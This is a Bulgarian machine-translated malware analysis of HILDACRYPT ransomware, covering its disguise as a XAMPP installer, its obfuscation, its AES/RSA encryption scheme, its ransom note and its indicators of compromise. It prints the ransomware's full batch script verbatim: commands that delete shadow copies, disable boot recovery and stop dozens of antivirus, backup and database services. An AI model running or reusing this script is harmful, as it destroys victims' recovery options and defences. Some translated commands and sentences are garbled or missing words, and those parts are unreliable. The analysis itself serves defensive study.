Здравей, Хабр! Отново говорим за най-новите версии на зловреден софтуер от категорията Ransomware. HILDACRYPT е нов ransomware, член на семейството на Hilda, открит през август 2019 г., кръстен на анимационния филм на Netflix, използван за разпространение на софтуера. Днес се запознаваме с техническите характеристики на този актуализиран рансъмуер вирус.
В първата версия на Hilda ransomware, връзка към такава, публикувана в Youtube анимационен сериал се съдържаше в писмото за откуп. HILDACRYPT се маскира като легитимен инсталатор на XAMPP, лесна за инсталиране дистрибуция на Apache, която включва MariaDB, PHP и Perl. В същото време cryptolocker има различно име на файл - xamp. Освен това файлът с ransomware няма електронен подпис.
Статичен анализ
Рансъмуерът се съдържа в PE32 .NET файл, написан за MS WindowsРазмерът му е 135 168 байта. Както основният програмен код, така и кодът на защитника са написани на C#. Според датата и часа на компилация, двоичният файл е създаден на 14 септември 2019 г.
Според Detect It Easy рансъмуерът се архивира с помощта на Confuser и ConfuserEx, но тези обфускатори са същите като преди, само ConfuserEx е наследник на Confuser, така че кодовите им подписи са подобни.
HILDACRYPT наистина е пакетиран с ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Вектор на атака
Най-вероятно рансъмуерът е открит на един от сайтовете за уеб програмиране, маскиран като легитимна XAMPP програма.
Цялата верига на инфекцията може да се види в .
Объркване
Низовете на ransomware се съхраняват в криптирана форма. При стартиране HILDACRYPT ги дешифрира с помощта на Base64 и AES-256-CBC.
Инсталация
На първо място, рансъмуерът създава папка в %AppDataRoaming%, в която параметърът GUID (Globally Unique Identifier) се генерира на случаен принцип. Добавяйки bat файл към това местоположение, вирусът рансъмуер го стартира чрез cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & изход
След това започва да изпълнява пакетен скрипт, за да деактивира системните функции или услуги.
Скриптът съдържа дълъг списък от команди, които унищожават скритите копия, деактивират SQL сървъра, архивират и антивирусни решения.
Например, той се опитва неуспешно да спре услугите на Acronis Backup. Освен това атакува системи за архивиране и антивирусни решения от следните доставчици: Veeam, Sophos, Kaspersky, McAfee и други.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
След като услугите и процесите, споменати по-горе, са деактивирани, cryptolocker събира информация за всички работещи процеси, като използва командата tasklist, за да гарантира, че всички необходими услуги не работят.
списък със задачи v/fo csv
Тази команда показва подробен списък на изпълняваните процеси, чиито елементи са разделени със знака „,“.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
След тази проверка рансъмуерът започва процеса на криптиране.
Шифрование
Криптиране на файлове
HILDACRYPT преглежда цялото намерено съдържание на твърдите дискове, с изключение на папките Recycle.Bin и Reference AssembliesMicrosoft. Последният съдържа критични dll, pdb и др. файлове за .Net приложения, които могат да повлияят на работата на ransomware. За търсене на файлове, които ще бъдат криптирани, се използва следният списък с разширения:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Рансъмуерът използва алгоритъма AES-256-CBC за криптиране на потребителски файлове. Размерът на ключа е 256 бита, а размерът на вектора за инициализация (IV) е 16 байта.
В следващата екранна снимка стойностите на byte_2 и byte_1 са получени на случаен принцип с помощта на GetBytes().
ключ
В И
Шифрованият файл има разширение HCY!.. Това е пример за криптиран файл. Ключът и IV, споменати по-горе, са създадени за този файл.
Ключово криптиране
Криптовалутата съхранява генерирания AES ключ в криптиран файл. Първата част на шифрования файл има заглавка, която съдържа данни като HILDACRYPT, KEY, IV, FileLen в XML формат и изглежда така:
Криптирането с AES и IV ключ се извършва с помощта на RSA-2048, а кодирането се извършва с помощта на Base64. Публичният ключ на RSA се съхранява в тялото на криптолокера в един от шифрованите низове в XML формат.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA публичен ключ се използва за криптиране на AES файловия ключ. Публичният RSA ключ е кодиран Base64 и се състои от модул и публичен експонент от 65537. Декриптирането изисква RSA частния ключ, който нападателят има.
След RSA криптиране AES ключът се кодира с помощта на Base64, съхранен в шифрования файл.
Съобщение за откуп
След като шифроването приключи, HILDACRYPT записва html файла в папката, в която е шифровал файловете. Известието за рансъмуер съдържа два имейл адреса, на които жертвата може да се свърже с нападателя.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
Известието за изнудване също съдържа реда „No loli is safe;)“ - препратка към аниме и манга герои с външния вид на малки момичета, забранени в Япония.
Продукция
HILDACRYPT, ново семейство рансъмуер, пусна нова версия. Моделът на криптиране не позволява на жертвата да дешифрира файлове, криптирани от рансъмуера. Cryptolocker използва методи за активна защита, за да деактивира услуги за защита, свързани със системи за архивиране и антивирусни решения. Авторът на HILDACRYPT е фен на анимационния сериал Hilda, показан в Netflix, връзката към трейлъра на който се съдържаше в писмото за откупуване на предишната версия на програмата.
Обикновено, и може да защити компютъра ви от рансъмуер HILDACRYPT, а доставчиците имат способността да защитят своите клиенти с . Защитата се осигурява от факта, че тези решения включват включва не само архивиране, но и нашата интегрирана система за сигурност - Осъществено от модел на машинно обучение и базирано на поведенческа евристика, технология, която е способна да се противопостави на заплахата от рансъмуер от нулев ден като никоя друга.
Показатели за компромис
Файлово разширение HCY!
HILDACRYPTReadMe.html
xamp.exe с една буква "p" и без цифров подпис
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Източник: www.habr.com
